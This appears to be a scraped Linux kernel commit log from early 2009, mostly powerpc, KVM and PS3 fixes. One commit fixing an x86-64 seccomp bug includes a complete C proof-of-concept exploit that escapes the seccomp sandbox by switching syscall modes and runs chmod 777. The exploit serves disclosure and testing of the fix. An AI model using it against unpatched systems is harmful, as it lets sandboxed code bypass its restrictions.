- 24 3月, 2009 17 次提交
-
-
由 Hollis Blanchard 提交于
Although BOOKE_MAX_INTERRUPT has the right value, the meaning is not match. Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
When itlb or dtlb miss happens, E500 needs to update some mmu registers. So that the auto-load mechanism can work on E500 when write a tlb entry. Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
E500 deosn't support this instruction. Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Kernel for E500 need clear dbsr when startup. So add dbsr register in kvm_vcpu_arch for BOOKE. Signed-off-by: NLiu Yu <yu.liu@freescale.com> Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
The Book E code will be shared with e500. I've left PID in kvmppc_core_emulate_op() just so that we don't need to move kvmppc_set_pid() right now. Once we have the e500 implementation, we can probably share that too. Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
e500 will provide its own implementation of these. Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Passing just the TLB index will ease an e500 implementation. Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Hollis Blanchard 提交于
Signed-off-by: NHollis Blanchard <hollisb@us.ibm.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Jan Kiszka 提交于
Remove the remaining arch fragments of the old guest debug interface that now break non-x86 builds. Signed-off-by: NJan Kiszka <jan.kiszka@siemens.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
由 Jan Kiszka 提交于
This rips out the support for KVM_DEBUG_GUEST and introduces a new IOCTL instead: KVM_SET_GUEST_DEBUG. The IOCTL payload consists of a generic part, controlling the "main switch" and the single-step feature. The arch specific part adds an x86 interface for intercepting both types of debug exceptions separately and re-injecting them when the host was not interested. Moveover, the foundation for guest debugging via debug registers is layed. To signal breakpoint events properly back to userland, an arch-specific data block is now returned along KVM_EXIT_DEBUG. For x86, the arch block contains the PC, the debug exception, and relevant debug registers to tell debug events properly apart. The availability of this new interface is signaled by KVM_CAP_SET_GUEST_DEBUG. Empty stubs for not yet supported archs are provided. Note that both SVM and VTX are supported, but only the latter was tested yet. Based on the experience with all those VTX corner case, I would be fairly surprised if SVM will work out of the box. Signed-off-by: NJan Kiszka <jan.kiszka@siemens.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
- 23 3月, 2009 1 次提交
-
-
由 Kumar Gala 提交于
Grant picked up the wrong version of "Respect _PAGE_COHERENT on classic ppc32 SW" (commit a4bd6a93) It was missing the code to actually deal with the fixup of _PAGE_COHERENT based on the CPU feature. Signed-off-by: NKumar Gala <galak@kernel.crashing.org>
-
- 18 3月, 2009 1 次提交
-
-
由 Geoff Levand 提交于
Update ps3_defconfig. Sets these options: CONFIG_PS3_VRAM=m CONFIG_BLK_DEV_DM=m CONFIG_USB_HIDDEV=y CONFIG_EXT4_FS=y Signed-off-by: NGeoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 17 3月, 2009 2 次提交
-
-
由 Kumar Gala 提交于
Since we now set _PAGE_COHERENT in the Linux PTE we shouldn't be clearing it out before we setup the SW TLB. Today all the SW TLB machines (603/e300) that we support are non-SMP, however there are some errata on some devices that cause us to set _PAGE_COHERENT via CPU_FTR_NEED_COHERENT. Signed-off-by: NKumar Gala <galak@kernel.crashing.org> Signed-off-by: NGrant Likely <grant.likely@secretlab.ca>
-
由 Piotr Ziecik 提交于
BestComm, a DMA engine in MPC52xx SoC, requires snooping when CPU caches are enabled to work properly. Adding CPU_FTR_NEED_COHERENT fixes NFS problems on MPC52xx machines introduced by 'powerpc/mm: Fix handling of _PAGE_COHERENT in BAT setup code' (sha1: 4c456a67). Signed-off-by: NPiotr Ziecik <kosmo@semihalf.com> Signed-off-by: NGrant Likely <grant.likely@secretlab.ca>
-
- 13 3月, 2009 1 次提交
-
-
由 Geert Uytterhoeven 提交于
Convert the PS3 Video RAM Storage Driver from an MTD driver to a plain block device driver. The ps3vram driver exposes unused video RAM on the PS3 as a block device suitable for storage or swap. Fast data transfer is achieved using a local cache in system RAM and DMA transfers via the GPU. The new driver is ca. 50% faster for reading, and ca. 10% for writing. Signed-off-by: NGeert Uytterhoeven <Geert.Uytterhoeven@sonycom.com> Acked-by: NGeoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 10 3月, 2009 1 次提交
-
-
由 Guennadi Liakhovetski 提交于
Defining flash partition table in platform code is deprecated, and due to recent changes linkstation and storcenter do not compile any more with their default configurations because of undefined references to physmap_set_partitions(). Instead of fixing them by using the correct kernel configuration macro in preprocessor conditional, remove partition table definitions altogether. Instead add support for partition definition on the command-line and in device tree to the default configurations. Signed-off-by: NGuennadi Liakhovetski <g.liakhovetski@gmx.de> Signed-off-by: NKumar Gala <galak@kernel.crashing.org>
-
- 04 3月, 2009 1 次提交
-
-
由 Tony Breeds 提交于
commit a969e76a (powerpc: Correct USB support for GE Fanuc SBC610) introduced a fixup for NEC usb controllers. This fixup should only run on GEF SBC610 boards. Fixes Fedora bug #486511. (https://bugzilla.redhat.com/show_bug.cgi?id=486511) Signed-off-by: NTony Breeds <tony@bakeyournoodle.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 03 3月, 2009 1 次提交
-
-
由 Roland McGrath 提交于
On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with ljmp, and then use the "syscall" instruction to make a 64-bit system call. A 64-bit process make a 32-bit system call with int $0x80. In both these cases under CONFIG_SECCOMP=y, secure_computing() will use the wrong system call number table. The fix is simple: test TS_COMPAT instead of TIF_IA32. Here is an example exploit: /* test case for seccomp circumvention on x86-64 There are two failure modes: compile with -m64 or compile with -m32. The -m64 case is the worst one, because it does "chmod 777 ." (could be any chmod call). The -m32 case demonstrates it was able to do stat(), which can glean information but not harm anything directly. A buggy kernel will let the test do something, print, and exit 1; a fixed kernel will make it exit with SIGKILL before it does anything. */ #define _GNU_SOURCE #include <assert.h> #include <inttypes.h> #include <stdio.h> #include <linux/prctl.h> #include <sys/stat.h> #include <unistd.h> #include <asm/unistd.h> int main (int argc, char **argv) { char buf[100]; static const char dot[] = "."; long ret; unsigned st[24]; if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0) perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?"); #ifdef __x86_64__ assert ((uintptr_t) dot < (1UL << 32)); asm ("int $0x80 # %0 <- %1(%2 %3)" : "=a" (ret) : "0" (15), "b" (dot), "c" (0777)); ret = snprintf (buf, sizeof buf, "result %ld (check mode on .!)\n", ret); #elif defined __i386__ asm (".code32\n" "pushl %%cs\n" "pushl $2f\n" "ljmpl $0x33, $1f\n" ".code64\n" "1: syscall # %0 <- %1(%2 %3)\n" "lretl\n" ".code32\n" "2:" : "=a" (ret) : "0" (4), "D" (dot), "S" (&st)); if (ret == 0) ret = snprintf (buf, sizeof buf, "stat . -> st_uid=%u\n", st[7]); else ret = snprintf (buf, sizeof buf, "result %ld\n", ret); #else # error "not this one" #endif write (1, buf, ret); syscall (__NR_exit, 1); return 2; } Signed-off-by: NRoland McGrath <roland@redhat.com> [ I don't know if anybody actually uses seccomp, but it's enabled in at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ] Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
-
- 01 3月, 2009 1 次提交
-
-
由 Grant Likely 提交于
Virtex FPGA designs have two serial port logic cores to choose from; the simple uartlite, and the full featured uart16550. Both cores are in common use so the defconfig should support both of them. Currently only console on uartlite is supported in the defconfig. This patch adds console support for the 16550 core. The Virtex reference designs do not work without this patch. Signed-off-by: NGrant Likely <grant.likely@secretlab.ca>
-
- 27 2月, 2009 1 次提交
-
-
由 Benjamin Herrenschmidt 提交于
The PCI 2.x cells used on some 44x SoCs only let us configure the decode for the low 32-bit of the incoming PLB addresses. The top 4 bits (this is a 36-bit bus) are hard wired to different values depending on the specific SoC in use. Our code used to work "by accident" until I added support for the ISA memory holes and while at it added more validity checking of the addresses. This patch should bring it back to working condition. It still relies on the device-tree being correct but that's somewhat a pre-requisite for anything to work anyway. Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org> Acked-by: NGeert Uytterhoeven <Geert.Uytterhoeven@sonycom.com> Acked-by: NJosh Boyer <jwboyer@linux.vnet.ibm.com>
-
- 26 2月, 2009 3 次提交
-
-
由 Mark Nelson 提交于
This fixes a regression introduced by commit a4e22f02 ("powerpc: Update 64bit __copy_tofrom_user() using CPU_FTR_UNALIGNED_LD_STD"). The same bug that existed in the 64bit memcpy() also exists here so fix it here too. The fix is the same as that applied to memcpy() with the addition of fixes for the exception handling code required for __copy_tofrom_user(). This stops us reading beyond the end of the source region we were told to copy. Signed-off-by: NMark Nelson <markn@au1.ibm.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Mark Nelson 提交于
This fixes a regression introduced by commit 25d6e2d7 ("powerpc: Update 64bit memcpy() using CPU_FTR_UNALIGNED_LD_STD"). This commit allowed CPUs that have the CPU_FTR_UNALIGNED_LD_STD CPU feature bit present to do the memcpy() with unaligned load doubles. But, along with this came a bug where our final load double would read bytes beyond a page boundary and into the next (unmapped) page. This was caught by enabling CONFIG_DEBUG_PAGEALLOC, The fix was to read only the number of bytes that we need to store rather than reading a full 8-byte doubleword and storing only a portion of that. In order to minimise the amount of existing code touched we use the original do_tail for the src_unaligned case. Below is an example of the regression, as reported by Sachin Sant: Unable to handle kernel paging request for data at address 0xc00000003f380000 Faulting instruction address: 0xc000000000039574 cpu 0x1: Vector: 300 (Data Access) at [c00000003baf3020] pc: c000000000039574: .memcpy+0x74/0x244 lr: d00000000244916c: .ext3_xattr_get+0x288/0x2f4 [ext3] sp: c00000003baf32a0 msr: 8000000000009032 dar: c00000003f380000 dsisr: 40000000 current = 0xc00000003e54b010 paca = 0xc000000000a53680 pid = 1840, comm = readahead enter ? for help [link register ] d00000000244916c .ext3_xattr_get+0x288/0x2f4 [ext3] [c00000003baf32a0] d000000002449104 .ext3_xattr_get+0x220/0x2f4 [ext3] (unreliab le) [c00000003baf3390] d00000000244a6e8 .ext3_xattr_security_get+0x40/0x5c [ext3] [c00000003baf3400] c000000000148154 .generic_getxattr+0x74/0x9c [c00000003baf34a0] c000000000333400 .inode_doinit_with_dentry+0x1c4/0x678 [c00000003baf3560] c00000000032c6b0 .security_d_instantiate+0x50/0x68 [c00000003baf35e0] c00000000013c818 .d_instantiate+0x78/0x9c [c00000003baf3680] c00000000013ced0 .d_splice_alias+0xf0/0x120 [c00000003baf3720] d00000000243e05c .ext3_lookup+0xec/0x134 [ext3] [c00000003baf37c0] c000000000131e74 .do_lookup+0x110/0x260 [c00000003baf3880] c000000000134ed0 .__link_path_walk+0xa98/0x1010 [c00000003baf3970] c0000000001354a0 .path_walk+0x58/0xc4 [c00000003baf3a20] c000000000135720 .do_path_lookup+0x138/0x1e4 [c00000003baf3ad0] c00000000013645c .path_lookup_open+0x6c/0xc8 [c00000003baf3b70] c000000000136780 .do_filp_open+0xcc/0x874 [c00000003baf3d10] c0000000001251e0 .do_sys_open+0x80/0x140 [c00000003baf3dc0] c00000000016aaec .compat_sys_open+0x24/0x38 [c00000003baf3e30] c00000000000855c syscall_exit+0x0/0x40 Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Michael Neuling 提交于
When we introduced VSX, we changed the way FPRs are stored in the thread_struct. Unfortunately we missed the load/store float double alignment handler code when updating how we access FPRs in the thread_struct. Below fixes this and merges the little/big endian case. Signed-off-by: NMichael Neuling <mikey@neuling.org> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 15 2月, 2009 1 次提交
-
-
由 Sheng Yang 提交于
kvm_arch_sync_events is introduced to quiet down all other events may happen contemporary with VM destroy process, like IRQ handler and work struct for assigned device. For kvm_arch_sync_events is called at the very beginning of kvm_destroy_vm(), so the state of KVM here is legal and can provide a environment to quiet down other events. Signed-off-by: NSheng Yang <sheng@linux.intel.com> Signed-off-by: NAvi Kivity <avi@redhat.com>
-
- 13 2月, 2009 4 次提交
-
-
由 Michael Neuling 提交于
Fix the VSX alignment handler for VSX registers > 32. 32-63 are stored in the VMX part of the thread_struct not the FPR part. Signed-off-by: NMichael Neuling <mikey@neuling.org> CC: stable@kernel.org (2.6.27 & .28 please) Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Geoff Levand 提交于
Change the PS3 hotplug memory routine ps3_mm_add_memory() from a core_initcall to a device_initcall. core_initcall routines run before the powerpc topology_init() startup routine, which is a subsys_initcall, resulting in failure of ps3_mm_add_memory() when CONFIG_NUMA=y. When ps3_mm_add_memory() fails the system will boot with just the 128 MiB of boot memory Signed-off-by: NGeoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Dave Hansen 提交于
Fix the powerpc NUMA reserve bootmem page selection logic. commit 8f64e1f2 (powerpc: Reserve in bootmem lmb reserved regions that cross NUMA nodes) changed the logic for how the powerpc LMB reserved regions were converted to bootmen reserved regions. As the folowing discussion reports, the new logic was not correct. mark_reserved_regions_for_nid() goes through each LMB on the system that specifies a reserved area. It searches for active regions that intersect with that LMB and are on the specified node. It attempts to bootmem-reserve only the area where the active region and the reserved LMB intersect. We can not reserve things on other nodes as they may not have bootmem structures allocated, yet. We base the size of the bootmem reservation on two possible things. Normally, we just make the reservation start and stop exactly at the start and end of the LMB. However, the LMB reservations are not aware of NUMA nodes and on occasion a single LMB may cross into several adjacent active regions. Those may even be on different NUMA nodes and will require separate calls to the bootmem reserve functions. So, the bootmem reservation must be trimmed to fit inside the current active region. That's all fine and dandy, but we trim the reservation in a page-aligned fashion. That's bad because we start the reservation at a non-page-aligned address: physbase. The reservation may only span 2 bytes, but that those bytes may span two pfns and cause a reserve_size of 2*PAGE_SIZE. Take the case where you reserve 0x2 bytes at 0x0fff and where the active region ends at 0x1000. You'll jump into that if() statment, but node_ar.end_pfn=0x1 and start_pfn=0x0. You'll end up with a reserve_size=0x1000, and then call reserve_bootmem_node(node, physbase=0xfff, size=0x1000); 0x1000 may not be on the same node as 0xfff. Oops. In almost all the vm code, end_<anything> is not inclusive. If you have an end_pfn of 0x1234, page 0x1234 is not included in the range. Using PFN_UP instead of the (>> >> PAGE_SHIFT) will make this consistent with the other VM code. We also need to do math for the reserved size with physbase instead of start_pfn. node_ar.end_pfn << PAGE_SHIFT is *precisely* the end of the node. However, (start_pfn << PAGE_SHIFT) is *NOT* precisely the beginning of the reserved area. That is, of course, physbase. If we don't use physbase here, the reserve_size can be made too large. From: Dave Hansen <dave@linux.vnet.ibm.com> Tested-by: Geoff Levand <geoffrey.levand@am.sony.com> Tested on PS3. Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Philippe Gerum 提交于
Fix _PAGE_CHG_MASK so that pte_modify() does not affect the _PAGE_SPECIAL bit. Signed-off-by: NPhilippe Gerum <rpm@xenomai.org> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 11 2月, 2009 1 次提交
-
-
由 Kumar Gala 提交于
The following commit: commit 64b3d0e8 Author: Benjamin Herrenschmidt <benh@kernel.crashing.org> Date: Thu Dec 18 19:13:51 2008 +0000 powerpc/mm: Rework usage of _PAGE_COHERENT/NO_CACHE/GUARDED broke setting of the _PAGE_COHERENT bit in the PPC HW PTE. Since we now actually set _PAGE_COHERENT in the Linux PTE we shouldn't be clearing it out before we propogate it to the PPC HW PTE. Reported-by: NMartyn Welch <martyn.welch@gefanuc.com> Signed-off-by: NKumar Gala <galak@kernel.crashing.org> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
- 10 2月, 2009 4 次提交
-
-
由 Michael Neuling 提交于
arch/powerpc/platforms/pseries/hotplug-memory.c uses remove_section_mapping() but doesn't include sparsemem.h which defines it. This can cause compilation fails for some configs. Signed-off-by: NMichael Neuling <mikey@neuling.org> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Benjamin Herrenschmidt 提交于
The new legacy_mem file in sysfs is causing problems with X on machines that don't support legacy memory access. The way I initially implemented it, we would fail with -ENXIO when trying to mmap it, thus exposing to X that we do support the API but there is no legacy memory. Unfortunately, X poor error handling is causing it to fail to start when it gets this error. This implements a workaround hack that instead maps anonymous memory instead (using shmem if VM_SHARED is set, just like /dev/zero does). Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Michael Neuling 提交于
arch/powerpc/oprofile/cell/spu_profiler.c is missing a asm/time.h include which is required for ppc_proc_freq. This can cause compile failures for some config combinations. Signed-off-by: NMichael Neuling <mikey@neuling.org> Acked-by: NArnd Bergmann <arnd@arndb.de> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-
由 Steven Rostedt 提交于
Impact: fix dynamic ftrace with large modules in PPC64 The math to calculate the offset into the TOC that is taken from reading the trampoline is incorrect. The bottom half of the offset is a signed extended short. The current code was using an OR to create the offset when it should have been using an addition. Signed-off-by: NSteven Rostedt <srostedt@redhat.com> Acked-by: NGeoff Levand <geoffrey.levand@am.sony.com> Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
-